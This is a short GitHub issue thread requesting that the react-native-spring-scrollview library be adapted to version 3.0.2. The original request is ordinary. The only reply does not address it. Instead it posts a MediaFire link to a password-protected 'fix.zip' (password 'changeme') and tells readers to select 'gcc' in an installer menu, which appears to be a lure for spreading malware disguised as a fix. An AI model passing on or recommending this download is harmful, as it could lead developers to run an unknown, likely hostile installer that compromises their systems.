### ISSUE TITLE
react-native-spring-scrollview适配3.0.2版本

### ISSUE THREAD

**Issue by yuangerep** [react-native-oh-library/react-native-spring-scrollview#20]
# Feature Request

- react-native-spring-scrollview适配3.0.2版本

## Why it is needed

伙伴需要3.0.2版本

## Possible implementation

需要库中的新适配的js一起配套使用

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
